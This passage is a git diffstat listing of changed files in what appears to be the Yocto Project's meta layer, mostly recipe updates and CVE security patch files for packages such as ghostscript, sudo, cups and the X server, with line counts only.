-rw-r--r--meta/recipes-devtools/tcf-agent/tcf-agent_git.bb3
-rw-r--r--meta/recipes-devtools/tcltk/tcl_8.6.10.bb2
-rw-r--r--meta/recipes-devtools/unfs3/unfs3_git.bb5
-rw-r--r--meta/recipes-devtools/unifdef/unifdef_2.12.bb1
-rw-r--r--meta/recipes-devtools/vala/vala.inc2
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch9
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-aarch643
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-all4
-rwxr-xr-xmeta/recipes-devtools/valgrind/valgrind/run-ptest10
-rw-r--r--meta/recipes-devtools/valgrind/valgrind_3.15.0.bb5
-rw-r--r--meta/recipes-devtools/xmlto/xmlto_0.0.28.bb5
-rw-r--r--meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch42
-rw-r--r--meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb5
-rw-r--r--meta/recipes-extended/bash/bash.inc6
-rw-r--r--meta/recipes-extended/bash/bash/CVE-2019-18276.patch (renamed from meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch)0
-rw-r--r--meta/recipes-extended/bash/bash_5.0.bb2
-rw-r--r--meta/recipes-extended/bc/bc_1.07.1.bb3
-rw-r--r--meta/recipes-extended/bzip2/bzip2/Makefile.am2
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch58
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch312
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch581
-rw-r--r--meta/recipes-extended/cpio/cpio_2.13.bb6
-rw-r--r--meta/recipes-extended/cracklib/cracklib_2.9.5.bb3
-rw-r--r--meta/recipes-extended/cups/cups.inc21
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2022-26691.patch33
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-32324.patch36
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-32360.patch31
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-34241.patch65
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-4504.patch40
-rw-r--r--meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb3
-rw-r--r--meta/recipes-extended/ed/ed_1.15.bb1
-rw-r--r--meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch28
-rw-r--r--meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch24
-rw-r--r--meta/recipes-extended/gawk/gawk_5.0.1.bb15
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch31
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch109
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch121
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch37
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch238
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch65
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch54
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch145
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch60
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch62
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch62
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch51
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript_9.52.bb18
-rw-r--r--meta/recipes-extended/go-examples/go-helloworld_0.1.bb2
-rw-r--r--meta/recipes-extended/grep/grep_3.4.bb1
-rw-r--r--meta/recipes-extended/groff/files/0001-Include-config.h.patch1026
-rw-r--r--meta/recipes-extended/groff/groff_1.22.4.bb16
-rw-r--r--meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch45
-rw-r--r--meta/recipes-extended/gzip/gzip_1.10.bb1
-rw-r--r--meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch79
-rw-r--r--meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch39
-rw-r--r--meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch39
-rw-r--r--meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch37
-rw-r--r--meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch45
-rw-r--r--meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch94
-rw-r--r--meta/recipes-extended/iputils/iputils_s20190709.bb8
-rw-r--r--meta/recipes-extended/less/less/CVE-2022-48624.patch41
-rw-r--r--meta/recipes-extended/less/less_551.bb1
-rw-r--r--meta/recipes-extended/libaio/libaio_0.3.111.bb2
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch183
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch23
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch172
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch321
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch121
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch93
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch29
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch43
-rw-r--r--meta/recipes-extended/libarchive/libarchive_3.4.2.bb14
-rw-r--r--meta/recipes-extended/libnsl/libnsl2_git.bb2
-rw-r--r--meta/recipes-extended/libnss-nis/libnss-nis.bb6
-rw-r--r--meta/recipes-extended/libsolv/files/CVE-2021-3200.patch82
-rw-r--r--meta/recipes-extended/libsolv/libsolv_0.7.10.bb4
-rw-r--r--meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch155
-rw-r--r--meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb6
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch10
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch224
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch100
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch35
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb4
-rw-r--r--meta/recipes-extended/logrotate/logrotate_3.15.1.bb6
-rw-r--r--meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch27
-rw-r--r--meta/recipes-extended/lsb/lsb-release_1.4.bb1
-rw-r--r--meta/recipes-extended/lsof/lsof_4.91.bb2
-rw-r--r--meta/recipes-extended/ltp/ltp_20200120.bb2
-rw-r--r--meta/recipes-extended/lzip/lzip_1.21.bb1
-rw-r--r--meta/recipes-extended/man-db/man-db_2.9.0.bb7
-rw-r--r--meta/recipes-extended/mc/mc_4.8.23.bb1
-rw-r--r--meta/recipes-extended/mdadm/files/CVE-2023-28736.patch77
-rw-r--r--meta/recipes-extended/mdadm/files/CVE-2023-28938.patch80
-rw-r--r--meta/recipes-extended/mdadm/mdadm_4.1.bb3
-rw-r--r--meta/recipes-extended/mingetty/mingetty_1.08.bb1
-rw-r--r--meta/recipes-extended/minicom/minicom_2.7.1.bb2
-rw-r--r--meta/recipes-extended/newt/libnewt_0.52.21.bb2
-rw-r--r--meta/recipes-extended/pam/libpam/CVE-2024-22365.patch59
-rw-r--r--meta/recipes-extended/pam/libpam_1.3.1.bb1
-rw-r--r--meta/recipes-extended/parted/parted_3.3.bb3
-rw-r--r--meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb2
-rw-r--r--meta/recipes-extended/perl/libtimedate-perl_2.30.bb1
-rw-r--r--meta/recipes-extended/procps/procps/CVE-2023-4016.patch85
-rw-r--r--meta/recipes-extended/procps/procps_3.3.16.bb3
-rw-r--r--meta/recipes-extended/psmisc/psmisc_23.3.bb2
-rw-r--r--meta/recipes-extended/quota/quota_4.05.bb1
-rw-r--r--meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb2
-rw-r--r--meta/recipes-extended/screen/screen/CVE-2021-26937.patch68
-rw-r--r--meta/recipes-extended/screen/screen/CVE-2023-24626.patch40
-rw-r--r--meta/recipes-extended/screen/screen_4.8.0.bb2
-rw-r--r--meta/recipes-extended/sed/sed_4.8.bb1
-rw-r--r--meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch66
-rw-r--r--meta/recipes-extended/shadow/files/CVE-2023-29383.patch54
-rw-r--r--meta/recipes-extended/shadow/files/CVE-2023-4641.patch146
-rw-r--r--meta/recipes-extended/shadow/shadow-sysroot_4.6.bb2
-rw-r--r--meta/recipes-extended/shadow/shadow.inc6
-rw-r--r--meta/recipes-extended/shadow/shadow_4.8.1.bb5
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch26
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb7
-rw-r--r--meta/recipes-extended/sudo/files/CVE-2023-22809.patch113
-rw-r--r--meta/recipes-extended/sudo/sudo.inc6
-rw-r--r--meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch29
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch59
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch646
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch26
-rw-r--r--meta/recipes-extended/sudo/sudo_1.8.32.bb (renamed from meta/recipes-extended/sudo/sudo_1.8.31.bb)9
-rw-r--r--meta/recipes-extended/sysklogd/sysklogd.inc2
-rw-r--r--meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch92
-rw-r--r--meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch46
-rw-r--r--meta/recipes-extended/sysstat/sysstat_12.2.1.bb5
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2021-20193.patch133
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2022-48303.patch43
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2023-39804.patch64
-rw-r--r--meta/recipes-extended/tar/tar_1.32.bb9
-rw-r--r--meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb1
-rw-r--r--meta/recipes-extended/timezone/timezone.inc8
-rw-r--r--meta/recipes-extended/timezone/tzdata.bb10
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch67
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch39
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch33
-rw-r--r--meta/recipes-extended/unzip/unzip_6.0.bb7
-rw-r--r--meta/recipes-extended/watchdog/watchdog_5.15.bb5
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch58
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch165
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb2
-rw-r--r--meta/recipes-extended/xinetd/xinetd_2.3.15.bb3
-rw-r--r--meta/recipes-extended/xz/xz/CVE-2022-1271.patch96
-rw-r--r--meta/recipes-extended/xz/xz_5.2.4.bb5
-rw-r--r--meta/recipes-extended/zip/zip_3.0.bb7
-rw-r--r--meta/recipes-gnome/epiphany/epiphany_3.34.4.bb4
-rw-r--r--meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch46
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch55
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch40
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch61
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb3
-rw-r--r--meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb2
-rw-r--r--meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb2
-rw-r--r--meta/recipes-gnome/libnotify/libnotify_0.7.8.bb7
-rw-r--r--meta/recipes-gnome/librsvg/librsvg_2.40.21.bb3
-rw-r--r--meta/recipes-gnome/libsecret/libsecret_0.20.1.bb1
-rw-r--r--meta/recipes-graphics/builder/builder_0.1.bb2
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch21
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch46
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch60
-rw-r--r--meta/recipes-graphics/cairo/cairo_1.16.0.bb1
-rw-r--r--meta/recipes-graphics/clutter/clutter-gst-3.0.inc4
-rw-r--r--meta/recipes-graphics/clutter/clutter-gtk-1.0.inc5
-rw-r--r--meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch3
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch33
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch38
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch31
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch40
-rw-r--r--meta/recipes-graphics/freetype/freetype_2.10.1.bb4
-rw-r--r--meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch56
-rw-r--r--meta/recipes-graphics/glew/glew/notempdir.patch19
-rw-r--r--meta/recipes-graphics/glew/glew_2.2.0.bb2
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch335
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch135
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch179
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb5
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch457
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch400
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch133
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch97
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch75
-rw-r--r--meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb5
-rw-r--r--meta/recipes-graphics/kmscube/kmscube_git.bb6
-rw-r--r--meta/recipes-graphics/libfakekey/libfakekey_git.bb2
-rw-r--r--meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb2
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch79
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch38
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch38
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb5
-rw-r--r--meta/recipes-graphics/libva/libva-utils_2.6.0.bb2
-rw-r--r--meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb2
-rw-r--r--meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch15
-rw-r--r--meta/recipes-graphics/mesa/mesa.inc7
-rw-r--r--meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb1
-rw-r--r--meta/recipes-graphics/mx/mx-1.0_1.4.7.bb2
-rw-r--r--meta/recipes-graphics/mx/mx.inc6
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch27
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch31
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch44
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch30
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch28
-rw-r--r--meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch30
-rw-r--r--meta/recipes-graphics/piglit/piglit_git.bb14
-rw-r--r--meta/recipes-graphics/startup-notification/startup-notification_0.12.bb5
-rw-r--r--meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb1
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch100
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb3
-rw-r--r--meta/recipes-graphics/vulkan/assimp_5.0.1.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-demos_git.bb6
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb6
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb3
-rw-r--r--meta/recipes-graphics/waffle/waffle_1.6.0.bb18
-rw-r--r--meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch360
-rw-r--r--meta/recipes-graphics/wayland/libinput_1.15.2.bb1
-rw-r--r--meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch111
-rw-r--r--meta/recipes-graphics/wayland/wayland_1.18.0.bb1
-rw-r--r--meta/recipes-graphics/wayland/weston-init/weston.ini2
-rw-r--r--meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch32
-rw-r--r--meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch57
-rw-r--r--meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch99
-rw-r--r--meta/recipes-graphics/wayland/weston_8.0.0.bb5
-rw-r--r--meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb3
-rw-r--r--meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb6
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch333
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch58
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch38
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch111
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch63
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch42
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch46
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch52
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch64
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb9
-rw-r--r--meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb (renamed from meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb)7
-rw-r--r--meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb2
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch34
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb1
-rw-r--r--meta/recipes-graphics/xorg-lib/xorg-lib-common.inc3
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg.inc14
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch36
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch38
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch36
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch70
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch40
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch64
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch49
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch39
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch55
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch86
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch78
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch51
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch75
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch38
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch84
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch102
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch79
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch63
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch55
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch87
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch221
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch41
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch45
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch64
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch113
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch74
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch57
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch49
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch47
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb61
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb38
-rw-r--r--meta/recipes-kernel/blktrace/blktrace_git.bb7
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb3
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev.inc7
-rw-r--r--meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch49
-rw-r--r--meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch42
-rw-r--r--meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch32
-rw-r--r--meta/recipes-kernel/dtc/dtc.inc4
-rw-r--r--meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch36
-rw-r--r--meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch35
-rw-r--r--meta/recipes-kernel/dtc/dtc_1.6.0.bb2
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb17
-rw-r--r--meta/recipes-kernel/kern-tools/kern-tools-native_git.bb6
-rw-r--r--meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb3
-rw-r--r--meta/recipes-kernel/kmod/kmod.inc3
-rw-r--r--meta/recipes-kernel/kmod/kmod/ptest.patch25
-rw-r--r--meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb (renamed from meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb)227
-rw-r--r--meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc2
-rw-r--r--meta/recipes-kernel/linux/cve-exclusion.inc13
-rw-r--r--meta/recipes-kernel/linux/cve-exclusion_5.4.inc9445
-rwxr-xr-xmeta/recipes-kernel/linux/generate-cve-exclusions.py101
-rw-r--r--meta/recipes-kernel/linux/kernel-devsrc.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-dummy.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-dev.bb2
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-yocto.inc4
-rw-r--r--meta/recipes-kernel/linux/linux-yocto_5.4.bb23
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch46
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch45
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch51
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch147
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb (renamed from meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb)13
-rw-r--r--meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb3
-rw-r--r--meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb5
-rwxr-xr-xmeta/recipes-kernel/modutils-initscripts/files/modutils.sh2
-rw-r--r--meta/recipes-kernel/perf/perf.bb10
-rw-r--r--meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch70
-rw-r--r--meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch29
-rw-r--r--meta/recipes-kernel/powertop/powertop_2.10.bb10
-rw-r--r--meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb2
-rw-r--r--meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch49
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.bb7
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.inc2
-rw-r--r--meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb (renamed from meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb)4
-rw-r--r--meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb2
-rw-r--r--meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb5
-rw-r--r--meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb2
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch97
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch61
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch53
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch36
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch41
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch67
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch136
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb14
-rw-r--r--meta/recipes-multimedia/flac/files/CVE-2020-22219.patch197
-rw-r--r--meta/recipes-multimedia/flac/files/CVE-2021-0561.patch34
-rw-r--r--meta/recipes-multimedia/flac/flac_1.3.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb5
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb2
